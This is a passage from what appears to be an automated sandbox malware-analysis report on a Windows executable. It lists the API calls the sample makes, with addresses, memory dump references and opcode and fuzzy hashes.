                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseDeleteValue
                                                                                      • String ID:
                                                                                      • API String ID: 2831762973-0
                                                                                      • Opcode ID: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                      • Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
                                                                                      • Opcode Fuzzy Hash: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                      • Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D
                                                                                      APIs
                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnableShow
                                                                                      • String ID:
                                                                                      • API String ID: 1136574915-0
                                                                                      • Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                      • Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
                                                                                      • Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                      • Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                        • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                        • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                                                        • Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2547128583-0
                                                                                      • Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                      • Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
                                                                                      • Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                      • Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\v4nrZtP7K2.exe,80000000,00000003), ref: 00405EE2
                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCreate
                                                                                      • String ID:
                                                                                      • API String ID: 415043291-0
                                                                                      • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                      • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                      • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                      • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
                                                                                      • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1375471231-0
                                                                                      • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                      • Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
                                                                                      • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                      • Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                                                                      APIs
                                                                                      • EnumWindows.USER32(00000000), ref: 6FFB2B6B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2081342100.000000006FFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FFB0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2081095935.000000006FFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2081452717.000000006FFB4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2081508923.000000006FFB6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_6ffb0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnumWindows
                                                                                      • String ID:
                                                                                      • API String ID: 1129996299-0
                                                                                      • Opcode ID: 40f1588549d93ae66ea6bb1ebc0e67c1aa90a6fcfb3a5f7ccba9e8b13b39e1c1
                                                                                      • Instruction ID: 282fd618d908342b26007386d3ca226dea16f7d8f9c4ba7661ebc45177995e45
                                                                                      • Opcode Fuzzy Hash: 40f1588549d93ae66ea6bb1ebc0e67c1aa90a6fcfb3a5f7ccba9e8b13b39e1c1
                                                                                      • Instruction Fuzzy Hash: D241B2B2414705DFCF22EF6AD9C5B493778EF053B8F24446EE404CA3A4DB3AA4959B90
                                                                                      APIs
                                                                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileMove
                                                                                      • String ID:
                                                                                      • API String ID: 3562171763-0
                                                                                      • Opcode ID: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                      • Instruction ID: 73a88bd3a5ced7927151e6ebce11b30d6a6a5b8b2c4e1db0cab765602213b928
                                                                                      • Opcode Fuzzy Hash: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                      • Instruction Fuzzy Hash: CBF09031A0851197DF10BBA54F4DD5E22509B8236CB28073BB412B21E1DAFDC542A56E
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                                        • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointerwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 327478801-0
                                                                                      • Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                      • Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
                                                                                      • Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                      • Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E
                                                                                      APIs
                                                                                      • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Create
                                                                                      • String ID:
                                                                                      • API String ID: 2289755597-0
                                                                                      • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                      • Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
                                                                                      • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                      • Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634
                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID:
                                                                                      • API String ID: 2738559852-0
                                                                                      • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                      • Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
                                                                                      • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                      • Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4
                                                                                      APIs
                                                                                      • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414982,0040CED0,004033DE,0040CED0,00414982,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                      • Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
                                                                                      • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                      • Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8
                                                                                      APIs
                                                                                      • VirtualProtect.KERNELBASE(6FFB505C,00000004,00000040,6FFB504C), ref: 6FFB29B1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2081342100.000000006FFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FFB0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2081095935.000000006FFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2081452717.000000006FFB4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2081508923.000000006FFB6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_6ffb0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: 485b0d38c25798146c45e02e3aeeb7674c1c6eedea9d9305c57b34cfb2c2bad4
                                                                                      • Instruction ID: 3ec5d19e238c64f18f7ab33e495a4d17df28c2896ce9b31001021e8194681ebe
                                                                                      • Opcode Fuzzy Hash: 485b0d38c25798146c45e02e3aeeb7674c1c6eedea9d9305c57b34cfb2c2bad4
                                                                                      • Instruction Fuzzy Hash: DDF0A5B0528A82DECB91DF2DD8C47093BF0BB1A3A4B18452EE148D6368E33D4064DB91
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062E3,00422708,00000000,?,?,Call,?), ref: 00406279
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID:
                                                                                      • API String ID: 71445658-0
                                                                                      • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                      • Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
                                                                                      • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                      • Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                      • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                      • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                      • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                      • Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
                                                                                      • Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                      • Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19
                                                                                      APIs
                                                                                      • GlobalAlloc.KERNELBASE(00000040,?,6FFB123B,?,6FFB12DF,00000019,6FFB11BE,-000000A0), ref: 6FFB1225
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2081342100.000000006FFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FFB0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2081095935.000000006FFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2081452717.000000006FFB4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2081508923.000000006FFB6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_6ffb0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocGlobal
                                                                                      • String ID:
                                                                                      • API String ID: 3761449716-0
                                                                                      • Opcode ID: 39d821b247f3cabf365ef29f40a8ef0fbf91e52e0d673c594dc9573536b2d504
                                                                                      • Instruction ID: 6e8f9c2d1b628ef1774ba4d01b1bb86ae975db54d7cd098ba5de974734fca5ae
                                                                                      • Opcode Fuzzy Hash: 39d821b247f3cabf365ef29f40a8ef0fbf91e52e0d673c594dc9573536b2d504
                                                                                      • Instruction Fuzzy Hash: DBB01270A10400DFEE009F68CD86F343654F701351F084000F600C0394C12448208534
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                      • GetClientRect.USER32(?,?), ref: 00405639
                                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                      • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                        • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040574F
